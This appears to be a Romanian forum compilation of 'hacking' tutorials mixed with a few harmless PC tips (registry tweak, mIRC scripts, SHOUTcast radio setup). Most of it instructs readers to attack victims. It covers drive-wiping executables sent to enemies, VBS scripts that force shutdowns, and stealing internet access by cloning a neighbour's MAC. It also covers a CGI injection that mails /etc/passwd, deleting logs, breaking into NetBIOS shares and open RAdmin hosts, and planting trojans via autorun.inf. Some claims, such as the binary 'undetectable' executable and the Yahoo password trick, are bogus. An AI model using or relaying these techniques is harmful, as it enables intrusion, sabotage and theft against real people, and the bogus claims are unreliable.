PENTRU INCEPUT VREAU SA II ROG PE CEI CE NU SE PRICEP SA NU SE BAGE LA ASA CEVA

Intrati in notepad si introduceti urmatoarele coduri binare apoi salvati fisierul ca executabil(.exe) apoi .......ce este de facut? il trimite-ti la dusmani sau mai bine dusmance(cele din urma cred ca vor cadea mai usor in plasa)

Kill Hard disk(omoara hdd-ul mai exact baga erori pe sectoare dupa care se va incepe MAREA SCARTAIALA la hdd):

01001011000111110010010101010101010000011111100000

Format c:\ (formateaza partitia c:\):

01100110011011110111001001101101011000010111010000 10000001100011001110100101110000100000001011110101 00010010111101011000

Format d:

01100110011011110111001001101101011000010111010000 10000001100100001110100101110000100000001011110101 00010010111101011000

Format a(daca aveti|are disketa introdusa):

01100110011011110111001001101101011000010111010000 10000001100001001110100101110000100000001011110101 00010010111101011000

Boot Failure(eroare de sistem ->reinstalare windows)

01100100011001010110110000100000001011110100011000 10111101010011001011110101000100100000011000110011 10100101110001100010011011110110111101110100001011 10011010010110111001101001

Ce mesaj vor primi cei la care trimite-ti fisierul dar mai ales il deschid?

16 Bit MS -DOS Sub System
c:\docume~1\ownar\desktop\hacker.exe
the NTVDM CPU has encountered an illegal instraction,
CS:0546 IP:0132 OP:c7 13 87 Fa Choose /close' to terminate the application

FISIERUL CREAT ESTE 100% NEDETECTABIL!

DUPA CE ATI CREAT EXECUTABILUL NU DESCHIDETI SINGURI FISIERUL CA O SA PATITI CE SCRIE MAI SUS!

In continuare va voi prezenta 2 exemple, in care vetzi invatza cum sa stingeti calculatorul cuiva de la distanta.

Deschidetzi notepad si scrieti urmatoarele..

msgbox "sup?"
msgbox "esti bine?"
msgbox "si eu ms de intrebare"
msgbox "stiai ca curiosii mor repede?"
msgbox "atunci dc ai intrat in asta?"
msgbox "ok...u are going down.."
Dim wshshell
set wshshell = wscript.CreateObject("WScript.Shell"
wshshell.run "shutdown -s -t 5"

Salvezi cu extensia .vbs si ii trimiti..si "se duce pe burta" respectivu(a)

******************************

A doua metoda ar fi sa facetzi un shortcut cu comanda

shutdown -s -t 5 -f -c "You will die man!"

si il trimiti pe mess dar ai grija cu -t mic, merge si 0 dar nu mai apare mesajul.
Daca -t e mare poate da comanda:

shutdown -a

pt anulare

ENJOY !!

Xp pass-cu acest program puteti schimba parola de la un calculator fara sa fiti ADMIN!

http://www.zdrive.ws/38994.html

Salut!
Pt ca am vazut ca pe forum se discuta problema "cum sa ai net moca" m-am gandit sa scriu
aceste randuri ca sa va luminez mintea.
Metoda pe care am sa o prezint va da roade numai daca sunteti in retea simpla cu admini-
strator care atribuie net prin DHCP , adika iti da IP rutabil dupa adresa MAC, fara nici
un fel logare cu user si parola sau altceva cum este de ex: la RDS, Matco, etc...
Haidetzi sa va spun in ce consta aceasta metoda si suntetzi liberi, dar sa nu spuneti ca
atzi auzit de la mine :P

=============================================================
=============================================================

***Reg ula de baza: alegeti o victima si incercati sa va faceti PC-ul cat mai asemanator cu
al ei ( nume -f important-, sistem, workgroup, etc ) astfel ISP-ului sa
nu-si dea seama ca e ceva suspect, sau potea iji da si asa, da mai greu.

-pentru a face aceasta mica infractiune aveti nevoie de un singur lucru: un scaner de re-
tea (netscan de la "Soft Perfect Scaner) e mai bun decat Angry. E intradevar mai lent, dar
aveti toata incredera ca isi face treaba cum trebuie.
-pentru prima data sa zicem ca stiti ce clasa de IP-uri au copatriotzii tai din retea
Booon... rulati scanerul si introduceti rangul IP-urilor de ex: 195.95.40.1-195.95.40.255
apoi ca duceti la optiuni (Ctrl+O) si bifati "Resolve MAC address" si "Resolve host name".
-dati drumul la scan su ajteptati cand s-a terminat uitati-va pe rezultate si alegeti o
victima care vi se pare mai "fraiera" ) care are un nume de retea de ex: Acasa, Emy,
Home-XJF454D, etc..(nu va alegeti de ex: Kenzor, Hacker sau altele care vi se par mai jme-
kere )
-va duceti frumos la MY Computer=> proprietati=> nume computer=> change si va puneti numele
victimei pe care ati ales-o.
-apoi copiezi MAC-ul victimei ii dai paste pe un fisier txt, el trebuie unpic preparat )
-dk macul arata asa: 00-04-61-52-77-7S voi va trebui sa ii stergeti cratimele "-" si il adu-
ceti la forma 00046152777S ii mai dati un copy si va duceti la proprietati placa de retea
a voastra dati Configure=>Advanced=>Network Address, bifati casuta si dati paste la MAC-ul
preparat dati "OK" si ajteptati...
-va duceti la proprietati IP setati-l pe automat, da-ti un repair si tre sa va apara IP-ul
victimei, dk a aparut dati un restart ca sa se skimbe si numele PC-ului. Dk nu, verificati
cu atentie inca odata dk ati executat corect pasii care vi am spus.
-ca sa fiti mai siguri ca nu va mai descopera nimeni instalati-va un FireWall bun, Zone
Alarm e superb, incercati-l! "trust me" Acesta va bloca pingul, broadcast, inforamtiile
despre NetBiosul tau, etc

***Observatie: -daca ati scanat si ati gasit adresa literara (vedeti $^dedicat
incepatorilor 100%^$ by Win32) nu o puneti pt ca nu e bine.
-Intrati in Start=>Run=>cmd=>nbtstat -a xxx.xxx.xxx.xxx
-unde xxx.xxx.xxx.xxx este IP-ul victimei, iar rezultatul km asa
trebuie sa arate:

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
Ady <00> UNIQUE Registered
Retea 2 <00> GROUP Registered
Ady <20> UNIQUE Registered
Retea 2 <1E> GROUP Registered
Retea 2 <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered

MAC Address = 00-04-61-52-77-7S

-unde "Ady" este numele real al PC-ului, iar "Retea 2" e numele
workgroup-ului.
-si pastea trebuie sa le pui si la tine dk vrei net

================================================================
================================================================

- sa mai zic o kestie: dk faceti intocmai cum v-am explicat nu veti mai avea problemae genu "IP conflict" si veti avea si voi si victima net, pt ca aveti acelaji nume, IP, mac.
-hmm... ar mai fi o metoda cu un program care-ti skimba direct macul, dar eu unul vreu sa va
si invat sa faceti scanari si sa vedeti cam cum sta treaba si logic, ca asa cu prog ala...
poc ai dat un MAC,poc ai dat "Apply" si gata ziceti "am invatat sa fur net, sunt hacker", dar
eu vreau sa si retineti ceva ca daia m-am kinuit att sa scriu si ceea ce v-am lasat in scris
am descoperit de unul singur in luni de zile...
-cam atat, sper, ca de obicei, ca am explicat pe intelesul tuturor cum sta treaba, spor la trb!

Material prezentat de Win32.Worm.Sasser.@**

Am gasit pe un site un tutorial video despre qm sa faci mai multe desktop-uri.

http://filme.bizi.ro/filme-cu-tutoriale ... 61h1d.html

.::Cum Sa Aflii Parola Unui Cont Yahoo ESTE TESTAT DE MINE SI CHIAR MERGE!!!::.

Se trimite o scrisoare la yahoo ca si cum ati "uitat" parola, iar serverul va da un fel de eroare si i-ti va trimite tie parola tie pe mail. Cititi cu atentie si complectati corect cu datele voastre ca in exemplul de mai jos. ATENTIE sa nu gresiti functioneaza o singura data. Dupa ce primiti parola la id-ul pe care vreti sa il spargeti schimbatio imediat inainte sa isi dea seama victima ca cineva a intrat pe messul sau pe mailul lui.

To
newpassrecover @yahoo.com

subiect=passrec

in scrisoare scrii
linia 1 =contul pentru care se cere recuperarea parolei
linia 2 libera (enter)
linia 3 contul tau (nu poate fi un cont mai nou de 35 zile sau care nu a fost folosit)
linia 4 libera
linia 5 =parola contului tau

EX:
__________________________________
|To: newpassrecover @yahoo.com
|
|Sub passrec
------------------------------------------------------
|vasilep (adica contul pentru care se cere recuperarea parolei). fara @yahoo.com
|
|ioanag (adica contul meu)
|
|ioneluta2000 (adica parola contului meu pentru confirmare )
________________________

se primeste o scrisoare cu informatii despre contul respectiv

liniile din scrisoare trebuie scrise exact asa, altfel nu merge.

VA RECOMAND SA NU ANCERCATI DAR DACA O FACETI FOLOSITI EXACT CUM E AN EXEMPLU ALFEL PIERZI SI TU PAROLA CONTULUI TAU SAU MAI EXAACT O FACI PUBLICA

pui asta intr-un fisier notepad si salvezi cu extensia .reg

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\yahoo\pager\Test]
"Plural"="1"

Dai double-click pe el si gata ai multi messenger

Poate stiti despre metoda asta sau ati auzit de ea in fine,eu postez.
Pt a-ti mari viteza la internet cu 20 % trebuie sa faci urmatoarele :

Deschizi : Start/Run/gpedit.msc

Ti se va deschide o fereastra pe nume GROUP POLICY

Aici intri la : Administrative Templates / Network / Qos Packet Scheduler

si aici in partea dreapta a windowului dai click pe Limit Reservable Bandwith pana ti

se deschide un nou window intitulat LIMIT RESERVABLE BANDWITH PROPERTIES ;

Aici selectezi ENABLE ; apply si ok . DONE

Cred ca toata lumea stie ce sunt "script-urile de mIRC"...
Defapt ele sunt tot mIRC-ul cel pe care il stim cu totii, doar ca au `suferit` diferite modificatii (design/functii/optiuni/...) de catre autorul script-ului...
Aici as vrea sa postati numele (si link-ul daca se poate) a celor mai bine-realizate mIRC Script-uri...
Va rog sa nu vorbiti despre acele scripturi care au modificate doar niste culori la background si la About (acela nu e un script de mIRC... e... mIRC colorat )

Eu folosesc X-Script in loc de mIRC-ul clasic... Cred ca este demn sa fie afisat aici deoarece are FOARTE multe modificari aduse de catre autorul lui fata de mIRC-ul clasic.
Il puteti download`a de-aici: http://www.download.com/X-Script/3000-2

1) Am adaugat tutorialul acesta pentru Incepatori.... sper sa va satisfaca cat de cat.

2)Hacking Unix

Inainte de a prezenta principalele tehnici de hack a SO Unix va trebui sa cititi ghidul de instalare Linux.Apoi ca sa va familiarizati cu comenzile linux dati click aici ca sa obtineti o lista cu principalele comenzi unix explicate pe intelesul tuturor.Acum putem intra in amanunte.

a)FTP

Dupa cum probabil cunoasteti deja ftp este un program cu ajutorul caruia puteti transfera fisiere intre calculatorul dumneavoastra si server.Acest utilitar este foarte folositor in momentul cand avem un cont local pe un anumit server sau cand serverul permite comexiuni anonime folosind perechile username:parola urmatoare annonymous:adresa_de mail sau ftp:guest.O conexiune ftp se poate stabili tastand 'ftp server.com' in casuta Start/Run,unde server.com este serverul la care doriti sa va conectati.In cazul unui atac efectiv asupra unui server,ftp-ul este folosit in combinatie cu telnetul.

b)TELNET

Telnetul este un utilitar care ne permite sa ne conectam la orice port deschis de pe un server si sa dam comenzi daemonului care asculta pe acel port.Mai jos o sa dau o lista cu porturile si serviciile cele mai frecvent utilizate:
port 21: ftp

port 22: SSH

port 23: telnet

port 25: SMTP

port 110: POP3

port 80: server web

port 111: NFS(Network File System)

port 139: SMB(Server Message Block)

port 6667: IRC(Internet Relay Chat)

Evident,fiecare daemon are un numar limitat de comenzi.Spre exemplu daca portul 23 este deschis,atunci daemonul telnet este activ si putem realiza o conexiune pe acel port numai daca avem drept de utilizator pe acel server.Dupa ce conexiunea este stabilita putem da comenzi unix pe server.Putem folosi acest lucru pentru a obtine controlul pe serverul respectiv.Cititi acest material pentru a vedea care sunt principalele tehnici si exploituri.Daca portul 80 este deschis atunci ne putem conecta pe acel port iar cand conexiunea este stabilita putem da comanda GET index.html.Ca raspuns vom primi pagina principala.Daca nu aveti posibilitatea sa instalati linux pe calculatorul personal atunci puteti folosi un shell acount,adica un cont unix pus la dispozitie de un furnizor de astfel de servicii.Aici puteti gasi unul.

c)PORT SCANNING

Pentru a vedea ce servicii ruleaza pe un server se foloseste scanarea porturilor.Astfel de programe se numesc scannere.Unele scannere sunt foarte complexe,acestea verificand si vulnerabilitatile cunoscute.Scannerele sunt concepute pentru diferite sisteme de operare.Pentru Windows: fscan,portscan,IIS scanner,Cerberus.Pentru Unix: SATAN,Strobe,Jakal,etc.Pentru scanarea porturilor eu folosesc JAKAL deoarece este invizibil adica nu lasa nici o urma de conexiune in log-uri.Ca scanner de vulnerabilitati folosesc SATAN.Verificati sectiunea LINKURI pentru a vedea unde puteti gasi aceste scannere.

d)CGI SCANNING

Atacurile asupra CGI sunt foarte populare si 65% dintre ele sunt incununate de succes.In prezent exista peste 500 de vulnerabilitati cunoscute.Un scanner foarte bun este Cgifound.exe.O sa dau un mic exemplu ca sa intelegeti despre ce este vorba.De exemplu daca pe un server NT exista fisierul /test/test.cgi puteti afla calea fizica a serverului folosind urmatorul link:www.server.com/cgi-bin/test/test.cgi.Daca vreti mai multe detalii cititi aici.Sa presupunem ca sunteti administrator de retea si trebuie sa scrieti un script pentru un motor de cautare pentru site-ul dvs.Un exemplu foarte simplu este urmatorul:

--------------------------------------------------------------

$a=grep $valoare_introdusa /usl/local/fisier.txt

echo $a fis.txt

cat fis.txt

rm fis.txt

--------------------------------------------------------------

Valoare_introdusa este valoarea introdusa de utilizator.Acesta este cautata intr-un anumit fisier stabilit dinainte cu inregistrari,toate referirile la ea sunt stocate in fis.txt,sunt afisate pe ecran iar apoi fis.txt este sters.Toate bune daca utilizatorul este de buna credinta.El poate introduce urmatorul sir:

blabla;mail E-mail </etc/passwd

Acest sir are ca efect cautarea sirului blabla in fisier iar apoi trimiterea la adresa mea a fisierului /etc/passwd.Asta deoarece unixul accepta executia de comenzi una dupa alta folosind metacaractere.De exemplu:

grep root /etc/passwd;echo a doua comanda;ls -ld /tmp;rlogin -l username hostname

Toate aceste comenzi sunt executate una dupa alta.Sper ca v-ati facut o mica idee despre ce inseamna vulnerabilitatea in CGI.Va recomand niste scannere cum ar fi Cgifound.exe si cgiS.c

e)BUFFER OVERFLOW

Ce inseamna de fapt buffer overflow?Umplerea unei zone de memorie alocata unor anumiti operanzi,operatori,instructiuni sau date.Cum se foloseste aceasta tehnica la obtinerea controlului asupra unui server?Serverul preia niste date de la utilizator si le executa.De exemplu GET cgi-bin/file.pl este o instructiune pe care noi o transmitem iar serverul o executa.Daca nu este specificat in codul sursa controlul asupra dimensiunii instructiunii respective,atunci datele care sunt in plus se executa aleator(ele sunt interpretate ca instructiuni).Aceste tipuri de exploturi sunt de obicei programe in C pe care le compilam pe masina noastra unix cu comanda 'gcc fisier.c -o fisierexecuatbil' si apoi il rulam cu parametrii stabiliti.Daca sunteti buni programatori in C puteti adapta programul respectiv sa ruleze in Windows.Tehnica este extrem de folositoare deoarece in majoritatea cazurilor nu puteti obtine controlul cu ajutorul tehnicilor obisnuite.Cum gasiti astfel de programe?Tastati in browser adresa unei liste de securitate,de exemplu www.freshmeat.net iar apoi intorduceti in caseta de text(motor de cautare) versiunea serverului care va intereseaza.De exemplu eu a trebuit sa testez recent vulnerabilitatea unui sistem pe care rula ProFtpd 1.2.0,asa ca am introdus in motorul de cautare 'proftpd' si am gasit un astfel de exploit care odata compilat pe o platforma FreeBSD si rulat cu parametrii corespunzatori permitea unui atacator sa incarce fisierele /etc/passwd si /etc/shadow ducand astfel la compromiterea sistemului.Desigur,abonarea la o lista de securitate e o idee buna atat pentru un administrator cat si pentru un hacker.

f)BRUTE FORCE

Aceasta tehnica este folositoare in cazul in care obtinem o lista cu toti utilizatorii.Se stie ca multi utilizatori au aceeasi parola ca si username-ul.Sau unele parole sunt de genul username100 sau username urmat de un numar.La inceput si eu foloseam asemenea parole .Prima mea parola era nebunu45.Cel mai bun program de brute force pentru Windows este Brutus.exe.Verificati sectiunea de linkuri.Am facut un program care se conecta pe portul 25 al unui server si lua prin brute force toti userii.Ia incercati o conexiune telnet pe portul 25 al unui server de mail si dati urmatoarele comenzi:

Daca adresa introdusa la "rcpt to" era corecta primeati un raspuns de genul "Recipient Ok",daca nu primeati ceva de genul "User unknown".Faceti un program care sa citeasca raspunsul serverului folosind un fisier de useri.Hackul implica inventivitate si imaginatie, iar tehnicile folosite difera de la caz la caz,de la server la server.

g)Recapitulare

Voi prezenta principalele etape pe care trebuie sa le parcurgeti pentru a obtine controlul asupra unui server sub UNIX:

1)adunati informatii (versiuni de server web,ftp,telnet,sendmail,etc) cu ajutorul telnetului si a unui program de scanare a porturilor

2)scanati bug-urile in CGI,bineinteles dupa ce verificati ca exista directorul cgi-bin pe server.

3)incercati toate exploiturile cunoscute pentru cazul respectiv si pentu versiunile de servicii care ruleaza pe porturile deschise.

4)Daca nimic nu merge,incercati sa obtineti un cont local,eventual pacalind un utilizator sa va dea acces.Astfel puteti verifica mai indeaproape serverul.

5)Dupa ce obtineti controlul stergeti toate jurnalele.De exemplu puteti sterge /var/adm/messages si/sau /usr/local/httpd/logs.Am dat un exemplu,acestea difera in functie de SO folosit.

3)Hacking Windows

Cred ca metoda este binecunoscuta,totusi o expun in tutorialul meu.Nu insist prea mult asupra ei deoarece o consider o metoda prea simpla si care nu necesita nici un fel de efort.

a)HACKUITI CALCULATOARE PERSONALE

Exista doua posibilitati:ori va luati programul Legion care face totul automat pentru voi ori faceti totul manual,e mai amuzant si mai educativ

1)Instalati-va protocolul NetBios sau NetBui(este esential sa aveti acest protocol instalat)

2)Scanati o zona de Ip-uri pentru portul 139

3)Sa presupunem ca ati gasit portul 139 deschis la adresa 156.1.4.4.Deschideti promptul de DOS si tastati "nbtstat -A 156.1.4.4".Daca apare un tabel atunci se pare ca aveti noroc.Deschideti Start/Run si tastati 156.1.4.4 Daca apare un mesaj de genul "Network not found" atunci treceti la urmatoarea tinta.Daca nu apare nimic,asteptati putin pana veti avea o fereastra cu directoarele Share de pe calculaltorul lamerului respectiv.Dovediti ca sunteti hackeri adevarati si nu stergeti nimic.

4)Daca vi se cere o parola atunci folositi programul Pqwak.exe care exploateaza un bug in win95/98/Millenium si sparge acea parola in 5 minute

b)HACKUITI SERVERE NT

Din moment ce altcineva a explicat eceasta tehnica inaintea mea nu mai este necesar sa pierd si eu timpul.Cititi aici cu mentiunea ca tehnica se poate aplica si in cazul unui cont platit nu numai in cazul unui cont anonim.Totusi daca doriti sa atacati un server NT este bine sa aveti si voi Windows NT cu aceeasi versiune de server instalata.

4)NetTools

Sunt necesare anumite utilitare folosite in scopul obtinerii de informatii despre potentiala tinta.Nu o sa comentez nici unul din ele(mai invatati si singuri) doar o sa le prezint,cu mentiunea ca orice utilizator le are instalate default pe calculator.

PENTRU WINDOWS

tracert----------informatii despre adresa IP a unui server(tracert -j server.com) precum si routere

nbtstat---------stiti deja ce face

netstat--------cititi help-ul

ping---------orice bou stie ce face acest utilitar

telnet---------l-am explicat pe scurt

ftp------------idem

PENTRU UNIX

N-am chef sa mai explic ce fac astea.Daca sunteti pe o platforma UNIX si nu stiti ce face o comanda tastati "man comanda".De exemplu "man ping"

finger

who

rwho

showemount

rlogin

rexec

rusers

rsh

ping

ftp

telnet

Bafta!

Pai ... in primul rand trebuie sa download-atzi Angry Ip Scanner, RAdmin.
Deschizi Angry Ip Scanner-ul , dai Crtl+o si in stanga la Display,selecteaza "Only Open Ports",apoi dai "Ok&Save".
Apoi dute la Options si dai la "Select Ports..." si acolo unde scrie "Enter Potrs To Scan" scrie 4899 !
Acum va trebuii sa gasesti o clasa de ip-uri (ex:218.19.167.149 to 220.1.1.1) si dai in stanga "Start".
Acum trebuie doar sa astepti.Cand va aparea un ip care are in fata un cerc verde inseamana ca e super !
Copiaza ip-ul si deschide Radmin-ul.Dai sus la "Connection",apoi "Connect to... "si unde scrie "Ip Adress Or DNS Name" baga ip tau.
Daca nu iti cere parola,inseamna ca te-ai scos sau poti pune o parola la vrajeala ,cel mai simplu 12345678 .
Poti face multe lucruri cu computer-ul victima.De exemlpu Dai click dreapta pe ip si dai la "File Transfer".Ti se va deschide o fereastra.Cel de sus e calc tau, iar cel de jos e calc victima.Aici poti face orice.

!!!Important!!!

Trebuie intai sa-l parolezi ca sa fi sigur ca nu va mai intra cineva pe el.Parolarea se face cu comanda "r_server /port:4899 /pass:ce_pass_vrei_tu /save".

Have Fun!

1. Ce este NetBIOS-ul.

2. NetBIOS in Windows.

3. Gasirea punctului slab.

4. Exploatarea punctului slab.

5. Cum treci de parola.

6. Cum poti determina un sistem de operare sa activeze optiunea de share pe toate partitiile sale.

____________________________________________________________________________________________________________________________

1 . NetBIOS (Network Basic Input/Output System) este un concept operational realizat de IBM si Sytek realizat pentru a indeplini rolul de API (Application

Programming Interface) pentru ca o aplicatie sa poata accesa resursele unei retele. Pe scurt NetBIOS permite aplicatiilor sa comunice cu o retea.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

2. NetBIOS in Windows. Un computer poate fi accesat cu NetBIOS daca are deschis portul 139. Acest port (139) este cel mai periculos port de pe internet. Toate fisierele si imprimantele ce au pornita optiunea de share pe un sistem Windows ruleaza pe acest port. Aproximativ 10% din totalitatea utilizatorilor de Internet au hard disk-urile expuse prin intermediul acestui port. Portul acesta (139) este primul port la care vrea sa se conecteze un Hacker si tot acest port este cel blocat de un Firewall.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

3. Gasirea punctului slab. Pentru a gasi un computer vulnerabil trebuie sa scanati o retea sau o arie de IP-uri pentru a vedea care are portul 139 deschis. Pentru acest lucru recomand folosirea programului IPScan (acest program se poate gasi pe CD-ul nostru). Odata ce se termina scanarea si se gasesc IP-uri vulnerabile se trece la punctul 4.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

4. Exploatarea punctului slab. Dupa alegerea IP-ului vulnerabil se trece la conectarea cu acesta astfel:

START > RUN > In casuta de RUN se introduce comanda \xxx.xxx.xxx.xxx apoi se da clic pe OK.

ATENTIE xxx.xxx.xxx.xxx este IP-ul gasit de voi asa ca inlocuiti x-urile cu IP-ul gasit

Daca totul a mers bine ar trebui sa se deschida o fereastra cu continutul hard disk-ului victimei. Acum puteti vedea, realiza download sau uploade sau chiar sterge fisierele de pe computerul victimei.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5. Cum treci de parola. Se poate intampla uneori ca computerul la care incerci sa te conectezi sa fie protejat de o parola. In acest caz trebuie sa folosesti programul PQwak (acest program se poate gasi pe CD-ul nostru). In acest program nu trebuie decat sa introduci IP-ul si numele de share. Numele de share este numele folder-ului care este protejat de parola. Dupa ce ati introdus aceste lucruri trebuie doar sa urmariti cum lucreaza PQwak.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

6. Cum poti determina un sistem de operare sa activeze optiunea de share pe toate partitiile sale. Daca partitia care are activata obtiunea de share este (C: D: etc.) atunci poti pune un troian care-ti poate oferi accesul la restul partitiilor si chiar la intregul computer. Pentru a realiza acest lucru trebuie creat un fisier ce va purta numele de autorun.inf Pentru a realiza acest fisier trebuie sa creati un fisier txt care sa contina urmatoarele:

---------------------------------------------------------------------------------------------------------------------------- ------------------------------------------

CELE SCRISE MAI JOS TREBUIESC COPIATE FARA MODIFICARI.

----------------------------------------------------------------------------------------------------------------------------- -----------------------------------------

[autorun]

open=autoexec.bak.exe

--------------------------------------------------------------------------------------------------------------- -------------------------------------------------------

Dupa care se salveaza fisierul txt modificandu-se extensia din .txt in .inf

Apoi cu ajutorul unui Troian (pe cd-ul nostru puteti gasi multe astfel de programe) se realizeaza un troian numit autoexec.bak.exe

Acum cand cele doua fisiere sunt gata trebuie sa le copiem in directorul principal adica in radacina. Spre exemplu daca avem acces la partitia C: atunci fisierele noastre vor fi copiate direct pe aceasta partitie fara sa fie puse in folder.

Acum nu trebuie decat sa asteptati ca victima sa acceseze partitia in care ati pus cele doua fisiere. Odata accesata acesta partitie troianul se va executa oferind acces la tot computerul.

Tutorial pentru a iti crea propriul post de radio pe internet

Descarcarea utilitarelor necesare pentru a va crea radio-ul

Pentru a va crea propriul post de radio, trebuei mai intai sa descarcati de pe internet cateva utilitare:

NullSoft Winamp
NullSoft WinAmp reprezinta unealta de baza cu ajutorul careia veti emite pe internet sau cu care va veti conecta la un alt server deja existent. Pentru a il descarca de pe internet dati click pe link-ul de mai jos:
http://www.winamp.com/player/free.php

2) SHOUTcast server
Acest program va permite sa va lansati pe internet propria statie de radio. Urmariti acest link pentru a descarca acest program:
http://www.shoutcast.com/download/files.phtml

SHOUTcast plug-in
Un plug-in de WinAmp cu ajutorul caruia va veti putea configure serverul de internet din interiorul programului. Acesta este accesibil pentru descarcare la:
http://www.snapfiles.com/get/dspwinamp.html

B. Configurarea utilitarelor pentru a putea emite

Inainte de a putea emite, exista cateva setari pe care va trebui sa le faceti.

è Intrati in folder-ul in care ati instalat SHOUTcast server si deschideti aplicatia sc_serv.exe.
è Pe ecran va aparea o fereastra in genul celei de mai jos:

è Din optiunile existente in toolbar-ul de sus alegeti Edit Config

è Acum se va deschide un fisier text asemanator celui prezent in imaginea de mai jos:

è In aceasta fereastra trebuie sa cautati o linie cu textul Password= .Cand ati gasit aceasta linie schimbati ceea ce scrie dupa semnul egal (“=”) cu parola dorita pentru serverul dumneavoastra. Spre exemplu daca parola pentru server as vrea sa fie “Test” as scrie:

è Salvati schimbarile facute in acest fisier si inchideti-l.

è Acum sunteti din nou in fereastra sc_serv.exe. Sunteti anuntat ca trebuie sa restartati aplicatia pentru ca schimbarile sa ia efect. Selectati OK din casuta de dialog si din fereastra sc_serv.exe alegeti Kill Server.

è Deschideti din nou aplicatia sc_serv.exe si lasati-o sa ruleze.

è Acum este timpul sa setam WinAmp-ul pentru a putea emite.
è Deschideti WinAmp si apsati Ctrl + P pentru a deschide fereastra Preferences.
è Selectati din optiunile existente DSP/Effects
è In lista din dreapta selectati Nullsoft SHOUTcast Source DSP dupa care apasati butonul Configure active plug-in.
è In fereastra aparuta selectatia optiunea Encoder si faceti urmatoarele setari:
1. In lista de encodere alegaeti Encoder 2
2. La encoder type alegeti MP3 Encoder
3. La encoder settings , in functie de conexiunea detinuta veti allege:
a. Pt dial-up (minim 56 kbps) – 32 kbps 22050 khz, Stereo
b. Pt cablu Tv (intre 64K – 256K) – 64kbps 44100 khz, Stereo
c. Conexiune cu viteza mai mare de 256 K – 128 kbps 44100 khz, Stereo

è Acum dati click pe optiunea Output si alegeti din lista disponibila Output 2.
è Dati click pe butonul Connection si la campul Password scrieti parola pe care ati scris-o si in fisierul text deschis mai devreme (ex: “Test”);
è La Optiunea Encoder alegeti 2.
è Acum dati click pe butonul Yellowpages.
è Bifati optiunea Make this server public.
è In campul Description scrieti numele radio-ului dumneavoastra.
è Bifati optiunea Enable Title UpDates.

è APSATI BUTONUL CONNECT

è Din acest moment emiteti pe internet. Pentru ca altii sa se conecteze la statia dumneavoastra:

è Trebuie sa va stiti ip-ul. De ex: daca ip-ul dumneavoastra este 123.123.123.123 atunci ei trebuie sa deschida WinAmp si sa apese CTRL + L iar in casuta ce se deschide vor scrie http://123.123.123.123:8000 .

è Forma generala este: http://ip-ul serverului:8000

è HAVE FUN!!

Daca nu ai server pe net! :P